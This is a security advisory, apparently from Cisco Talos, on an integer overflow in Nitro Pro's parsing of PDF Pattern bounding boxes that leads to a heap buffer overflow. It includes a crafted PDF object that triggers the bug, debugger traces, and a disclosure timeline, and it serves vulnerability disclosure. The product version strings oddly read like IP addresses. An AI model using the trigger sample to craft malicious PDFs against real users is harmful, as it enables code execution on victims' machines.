An exploitable code execution vulnerability exists in the way Nitro Pro 126.96.36.199 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. In order to trigger this vulnerability, victim must open a malicious file.
Nitro Pro 188.8.131.52
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-190 - Integer Overflow or Wraparound
Nitro PDF allows users to save, read, sign and edit PDF files on their machines.
PDF standard allows for creating geometrical patterns that can be tiled and used to draw other shapes. These are specified via
/Pattern objects and can be used inside PDF content streams. Important property of a
/Pattern object is the
/BBox property which specifies a bounding box rectangle that will contain the pattern. There exists an integer overflow in the way NitroPDF parses dimensions of this bounding box which can be triggered via the following sample
11 0 obj << /Type /Pattern /PatternType 1 /PaintType 1 /TilingType 1 /BBox [4294967295 0 0 1] /XStep 1 /YStep 1 /Length 56>> stream q (AAAA)Tj Q endstream endobj
Notice, in the above object, the abnormally large value of first coordinate of the
BBox property. While parsing the
/Pattern object, this value is used in a number of floating point calculations and is ultimately truncated to 0x80000000 when converting from floating point to integer value:
00007ffa`f10f7dce f20f2cc0 cvttsd2si eax,xmm0 00007ffa`f10f7dd2 89842428010000 mov dword ptr [rsp+128h],eax 00007ffa`f10f7dd9 f20f2cc6 cvttsd2si eax,xmm6 00007ffa`f10f7ddd 89842424010000 mov dword ptr [rsp+124h],eax 0:000> ?xmm6 Evaluate expression: 4755801206503243776 = 42000000`00000000 0:000> ?eax Evaluate expression: 2147483648 = 00000000`80000000
Continuing the execution from the above point leads to the following loop:
00007ffa`f10f9d40 c740feffffff00 mov dword ptr [rax-2],0FFFFFFh 00007ffa`f10f9d47 488d4004 lea rax,[rax+4] 00007ffa`f10f9d4b 83c1ff add ecx,0FFFFFFFFh 00007ffa`f10f9d4e 75f0 jne npdf!PDTextIsSpaceBetween+0x14f350 (00007ffa`f10f9d40) 0:000> ?rcx Evaluate expression: 2147483648 = 00000000`80000000
In the above code, we see a loop that writes to memory pointed to by
rax 4 bytes at a time with the loop guard in
ecx being effectively decremented by 1. Value in
ecx is treated as a signed integer and is in this case the most negative value possible, so first decrement will lead to integer wraparound which will subsequently lead to a buffer overflow on the heap:
0:000> g (1170.8b8): Access violation - code c0000005 (first/second chance not available) First chance exceptions are reported before any exception handling. This exception may be expected and handled. Time Travel Position: 10D7EF2:0 npdf!PDTextIsSpaceBetween+0x14f350: 00007ffa`f10f9d40 c740feffffff00 mov dword ptr [rax-2],0FFFFFFh ds:000001f7`463fd000=c0c0c0c0 0:000> k 5 # Child-SP RetAddr Call Site 00 0000003b`9c1fc980 00007ffa`f10ef4a0 npdf!PDTextIsSpaceBetween+0x14f350 01 0000003b`9c1fdea0 00007ffa`f0f8bfa7 npdf!PDTextIsSpaceBetween+0x144ab0 02 0000003b`9c1fe410 00007ffa`f0f8d3d7 npdf!init_npdf_optional_features+0x7cc7 03 0000003b`9c1fe4b0 00007ffa`f0f84fca npdf!init_npdf_optional_features+0x90f7 04 0000003b`9c1fe620 00007ffa`f0fa2780 npdf!init_npdf_optional_features+0xcea 0:000> ?rcx Evaluate expression: 2147483644 = 00000000`7ffffffc
From the above debugger output, we can see that
ecx has wrapped around and increments to
rax have resulted in out of bounds write access constituting a buffer overflow. With careful choice of other
/Pattern object parameters, such as
YStep, specific overflow size could be achieved which could lead to further memory corruption and ultimately arbitrary code execution.
2020-02-17 - Vendor Disclosure
2020-05-18 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.